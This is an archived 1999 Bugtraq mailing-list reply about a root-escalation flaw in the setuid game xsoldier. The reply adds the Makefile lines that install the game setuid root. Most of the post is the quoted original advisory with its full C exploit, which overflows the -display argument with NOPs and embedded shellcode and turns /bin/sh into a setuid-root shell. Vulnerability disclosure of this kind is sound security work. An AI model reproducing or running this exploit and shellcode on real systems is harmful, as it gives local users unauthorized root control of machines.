[12989] in bugtraq
Xsoldier xploit (was: FreeBSD 3.3 xsoldier root exploit)
daemon@ATHENA.MIT.EDU (Spidey)
Thu Dec 16 11:57:32 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <14424.26197.952088.538641@anarcat.dyndns.org>
Date: Wed, 15 Dec 1999 23:11:01 -0500
Reply-To: Spidey <beaupran@iro.umontreal.ca>
From: Spidey <beaupran@IRO.UMONTREAL.CA>
X-To: Brock Tellier <btellier@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Just to make things clear. This is not particular to FreeBSD. This is
the xsoldier program compiled normally. In fact, in the distribution
of xsoldier, the Makefile precisely specifies that the program should
be installed suid:
install.bin::
@if [ -d $(BINDIR) ]; then set +x; else (set -x; $(MKDIRHIER) $(
BINDIR)); fi
$(INSTALL) -c -m 4755 $(PROGRAM) $(BINDIR)/$(PROGRAM)
@echo "install bin . done"
That is all...
--- Big Brother told Brock Tellier to write, at 17:11 of December 15:
> Greetings,
>
> OVERVIEW
> A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
> access. This user does not have to have a valid $DISPLAY to exploit this.
>
> BACKGROUND
> Only FreeBSD 3.3-RELEASE has been tested. xsoldier, suid-root by default, was
> installed as part of the X11 games packages via /stand/sysinstall.
>
> DETAILS
> More problems with FreeBSD 3.3 ports. This time with xsoldier, a suid-root
> game. A simple overflow in the -display option allows any user to gain root.
> Although xsoldier only runs under X, a long -display arg on the CL will allow
> us to gain root.
>
> --- xsoldierx.c ---
> /*
> * xsoldier exploit for Freebsd-3.3-RELEASE
> * Drops a suid root shell in /bin/sh
> * Brock Tellier btellier@usa.net
> */
>
>
> #include <stdio.h>
>
> char shell[]= /* mudge@l0pht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
>
> #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
>
> void buildui() {
> FILE *fp;
> char cc[100];
> fp = fopen("/tmp/ui.c", "w");
> fprintf(fp, CODE);
> fclose(fp);
> snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
> system(cc);
> }
>
> main (int argc, char *argv[] ) {
> int x = 0;
> int y = 0;
> int offset = 0;
> int bsize = 4400;
> char buf[bsize];
> int eip = 0xbfbfdb65; /* works for me */
> buildui();
>
> if (argv[1]) {
> offset = atoi(argv[1]);
> eip = eip + offset;
> }
> fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
> <btellier@usa.net>\n");
> fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
> fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>
> for ( x = 0; x < 4325; x++) buf[x] = 0x90;
> fprintf(stderr, "NOPs to %d\n", x);
>
> for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
> fprintf(stderr, "Shellcode to %d\n",x);
>
> buf[x++] = eip & 0x000000ff;
> buf[x++] = (eip & 0x0000ff00) >> 8;
> buf[x++] = (eip & 0x00ff0000) >> 16;
> buf[x++] = (eip & 0xff000000) >> 24;
> fprintf(stderr, "eip to %d\n",x);
>
> buf[bsize]='\0';
>
> execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
>
> }
>
> -------
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> btellier@usa.net
>
> ____________________________________________________________________
> Get free email and a permanent address at http://www.netaddress.com/?N=1
--
Si l'image donne l'illusion de savoir
C'est que l'adage pretend que pour croire,
L'important ne serait que de voir
Lofofora
